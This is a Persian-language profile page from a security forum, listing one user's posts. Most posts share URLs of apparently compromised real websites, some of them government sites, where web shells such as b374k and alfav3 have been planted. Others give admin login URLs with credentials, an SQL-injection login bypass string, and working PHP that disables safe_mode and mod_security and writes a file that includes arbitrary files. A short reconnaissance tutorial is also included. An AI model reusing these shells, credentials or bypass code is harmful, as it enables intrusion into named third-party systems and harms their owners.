رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

rajaz

ICG Member
  • تعداد ارسال ها

    204
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

آخرین بار برد rajaz در اردیبهشت 4 2021

rajaz یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

3 Neutral

9 دنبال کننده

درباره rajaz

  • تاریخ تولد 01/02/1999

Converted

  • Name
    rajaz
  • Main os
    Ubuntu
  • Programming language
    خیر

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. rajaz

    هک اسکریپت ما + جایزه

    =))
  2. rajaz

    Target Trainings

    http://gaelleleboulicaut.com/admin '=' 'or'
  3. rajaz

    تست نفوذ سایتی که Php?id ندارد ?

    هر کدوم از مباحث بالا بسیار گستره هستند و روش های خاص خودشونو دارن سرچ کنید "دوره OWASP"
  4. rajaz

    تست نفوذ سایتی که Php?id ندارد ?

    سلام خوشبختانه تست نفوذ تنها به sql injection ختم نمیشه و متاسفانه اکثر کاربران ایرانی همین sql injection رو یاد گرفتند شما میتونید روش های دیگه ای مثل : کوکی ها ، ورودی ها ، آپلودر و... رو مورد تست نفوذ قرار بدید
  5. rajaz

    Target Trainings

    قابل ثبت در زون اچ www.veenayogakendra.com/admin/gallery/170664052alfav3-encoded.phtml
  6. rajaz

    Target Trainings

    http://khokyanglocal.go.th/khokyanglocal/mainfile/alfav3-encoded.php
  7. سلام ؛ مطابق فیلم آموزشی پیش برید اسکریپت اجرا میشه python script.py proxy.txt t.me/ch/1
  8. همانطور که میدانید اولین مرحله در هکینگ و تست نفوذ پیدا کردن اطلاعات کامل از هدف میباشد که اصطلاحاً به این کار Foot Printing میگوییم . یکی از عمده مراحل footprinting شناسایی سیستم عامل هدف است که ما میتوانیم بر اساس سیستم عامل سرور حملات خودمونو اجرا کنیم . روش اول : با استفاده از ping ما با استفاده از این روش میتوانیم خیلی راحت نوع سیستم عامل را به دست بیاریم . دستور ping iran-cyber.net اگر TTL دستور ما کم تر 64 بود سیستم عامل لینوکسی است اگر TTL دستور بین 64 تا 128 باشد سیستم عامل ویندوزی است و اگر بیشتر از 128 باشد سیستم عامل متفرقه میباشد . مشکلی که این کار دارد میتواند ما را به دام بیندازد چون رد پایی از خودمون به جا میگذاریم ؛ از روش های دیگه ای مانند سایت های آنلاین هم میتوانیم بهره بگیریم دو سایت زیر میتوانند علاوه بر سیستم عامل مصرفی تارگت اطلاعات دیگری مثل ایپی ، اطلاعات SSL ، وب سرور ، تکنلوژی های به کار رفته در صفحه وب و... را به ما بدهند . https://toolbar.netcraft.com https://www.shodan.io همچنین ما میتوانیم از ابزار NMAP کمک بگیریم
  9. rajaz

    Target Trainings

    بخورید بیاشامید ولی دیفیس نکنید http://jdlsociety.com/uploads/file/b374k%20v2.7.php
  10. rajaz

    Target Trainings

    دولتی http://ibook.bteb.gov.bd/uploads/1.php
  11. rajaz

    Target Trainings

    http://korea-avtotrade.com.ua/media/upload/ay.php
  12. راه های زیادی هست اما باید همشونو امتحان کنید ، اتفاقاً چن وقت پیش به یک سرور اینطوری برخوردم اما با php.ini بایپس شد . اگر قابلیت آپلود یا ادیت php.ini رو دارید کد زیر رو قرار بدید safe_mode = OFF disable_functions = NONE open_basedir = NONe [spoiler=.php] <html> <b><center><h2> <font color="#00ff00"> Safe_Mode Off By <font color="#ff0000"> Solt6n</b> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <style type="text/css">BODY { BACKGROUND-COLOR: #000000 } </html> <?php $php = fopen("php.ini", "w"); $entry_line=' safe_mode = Off '; fputs($php, $entry_line); fclose($php); $ini = fopen("ini.php", "w"); $ini_line=' <?php echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_GET["ss"]); ?>'; fputs($ini, $ini_line); fclose($ini); $hta = fopen(".htaccess", "w"); $hta_line=' <IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off </IfModule>'; fputs($hta, $hta_line); fclose($hta); ?> و در اخر این تاپیک هم ببینید https://iran-cyber.net/forums/threads/bypass-disable-function.2046/
  13. rajaz

    Target Trainings

    http://voc.co.in/admin admin:admin123
  14. rajaz

    Target Trainings

    http://ejcpl.net/wordpress/wp-admin rajaz:rajaz http://ejcpl.net/wordpress/wp-content/plugins/gutenberg/build/1.php

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...